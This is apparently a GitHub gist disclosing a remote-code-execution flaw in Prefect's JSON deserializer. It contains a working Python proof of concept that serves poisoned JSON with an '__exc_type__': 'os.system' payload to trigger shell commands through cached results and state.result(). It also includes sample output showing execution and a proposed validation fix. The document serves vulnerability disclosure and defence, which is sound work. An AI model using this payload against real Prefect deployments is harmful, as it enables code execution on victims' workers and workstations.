Skip to content

Instantly share code, notes, and snippets.

@logicx24
Last active February 20, 2026 20:18
Show Gist options
  • Select an option

  • Save logicx24/aeade82505da5732c7a7f9ab9cde4f99 to your computer and use it in GitHub Desktop.

Select an option

Save logicx24/aeade82505da5732c7a7f9ab9cde4f99 to your computer and use it in GitHub Desktop.
Prefect JSON Deserializer RCE via Second-Order Data Poisoning
#!/usr/bin/env python3
"""
PoC: Prefect Second-Order RCE via External Data Poisoning
Tested against: Prefect 3.6.18
Demonstrates two deserialization paths:
1. Cache hit: second flow run reads cached result -> RCE on worker
2. state.result(): client reads flow run from API -> RCE on client
"""
import json
import os
import shutil
import tempfile
from http.server import HTTPServer, BaseHTTPRequestHandler
from pathlib import Path
from threading import Thread
RCE_MARKER_CACHE = Path("/tmp/prefect_rce_cache.txt")
RCE_MARKER_STATE = Path("/tmp/prefect_rce_state.txt")
API_PORT = 9999
class PoisonedAPI(BaseHTTPRequestHandler):
"""Simulates a compromised external data source."""
def do_GET(self):
marker = RCE_MARKER_STATE if "state" in self.path else RCE_MARKER_CACHE
payload = {
"users": [{"id": 1, "name": "Alice"}],
"stats": {"__exc_type__": "os.system", "message": f"id > {marker}"},
}
self.send_response(200)
self.send_header("Content-Type", "application/json")
self.end_headers()
self.wfile.write(json.dumps(payload).encode())
def log_message(self, *_):
pass
def test_cache_hit_rce():
"""Cache hit triggers deserialization -> RCE on worker."""
import httpx
from prefect import flow, task
from prefect.cache_policies import INPUTS
# result_serializer="json" auto-enables persist_result=True
@task(result_serializer="json", cache_policy=INPUTS)
def fetch_data(url: str):
return httpx.get(url, timeout=10).json()
@flow
def pipeline(url: str):
return fetch_data(url)
url = f"http://127.0.0.1:{API_PORT}/api/cache"
pipeline(url) # Run 1: fetch + persist
pipeline(url) # Run 2: cache hit -> RCE
assert RCE_MARKER_CACHE.exists(), "Cache path: RCE did not trigger"
print(f"[1] Cache hit RCE: {RCE_MARKER_CACHE.read_text().strip()}")
def test_state_result_rce():
"""Client reads flow run from API, calls state.result() -> RCE on client."""
import httpx
from prefect import flow, task
from prefect.client.orchestration import get_client
# result_serializer="json" auto-enables persist_result=True
@task(result_serializer="json")
def fetch_data(url: str):
return httpx.get(url, timeout=10).json()
@flow(result_serializer="json")
def pipeline(url: str):
return fetch_data(url)
url = f"http://127.0.0.1:{API_PORT}/api/state"
state = pipeline(url, return_state=True)
flow_run_id = state.state_details.flow_run_id
with get_client(sync_client=True) as client:
flow_run = client.read_flow_run(flow_run_id)
flow_run.state.result()
assert RCE_MARKER_STATE.exists(), "state.result() path: RCE did not trigger"
print(f"[2] state.result() RCE: {RCE_MARKER_STATE.read_text().strip()}")
def main():
RCE_MARKER_CACHE.unlink(missing_ok=True)
RCE_MARKER_STATE.unlink(missing_ok=True)
storage = tempfile.mkdtemp()
os.environ["PREFECT_LOCAL_STORAGE_PATH"] = storage
server = HTTPServer(("127.0.0.1", API_PORT), PoisonedAPI)
Thread(target=server.serve_forever, daemon=True).start()
try:
test_cache_hit_rce()
test_state_result_rce()
finally:
server.shutdown()
RCE_MARKER_CACHE.unlink(missing_ok=True)
RCE_MARKER_STATE.unlink(missing_ok=True)
shutil.rmtree(storage, ignore_errors=True)
if __name__ == "__main__":
main()

Prefect JSON Deserializer RCE via Upstream Data Poisoning

Summary

Prefect's JSON deserializer executes arbitrary callables when it encounters a dictionary containing an __exc_type__ key. An attacker who controls an external data source that a Prefect task fetches can achieve remote code execution on any system that later deserializes the task result without needing Prefect access.

Vulnerable Code

src/prefect/serializers.py:

def prefect_json_object_decoder(result: dict[str, Any]) -> Any:
    if "__class__" in result:
        # ...
    elif "__exc_type__" in result:
        return from_qualified_name(result["__exc_type__"])(result["message"])
    else:
        return result

from_qualified_name imports any Python module/attribute. There is no validation on the __exc_type__ value. The object_hook fires on every dict in the JSON tree, so the payload can be nested arbitrarily deep.

Why This Is a Privilege Escalation

Prefect tasks run arbitrary code without a sandbox. So a malicious task author gaining RCE is not a meaningful finding. The issue is that the deserializer treats data as code, which creates privilege escalation across trust boundaries:

  1. An attacker poisons an external data source (API, database, message queue, user-submitted input).
  2. A legitimate task fetches and returns this data. Setting result_serializer="json" (recommended by Prefect for Pydantic compatibility) auto-enables result persistence.
  3. The poisoned result detonates when deserialized in a different security context: a developer's laptop via state.result(), a more-privileged worker on cache hit, or a downstream task.

The attacker doesn't need Prefect access, as the framework converts data from an untrusted source into code execution on a separate, potentially more-privileged machine.

PoC

See attached file. Sample output:

Task run 'fetch_data-b0d' - Finished in state Completed()
Task run 'fetch_data-325' - Finished in state Cached(type=COMPLETED)
Task run 'fetch_data-119' - Finished in state Completed()
[1] Cache hit RCE: uid=1000(devbox) gid=1001(devbox) groups=1001(devbox),27(sudo),1000(docker)
[2] state.result() RCE: uid=1000(devbox) gid=1001(devbox) groups=1001(devbox),27(sudo),1000(docker)

Recommended Fix

Validate __exc_type__ against BaseException subclasses:

elif "__exc_type__" in result:
    cls = from_qualified_name(result["__exc_type__"])
    if not (isinstance(cls, type) and issubclass(cls, BaseException)):
        raise ValueError(f"Invalid exception type: {result['__exc_type__']}")
    return cls(result["message"])
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment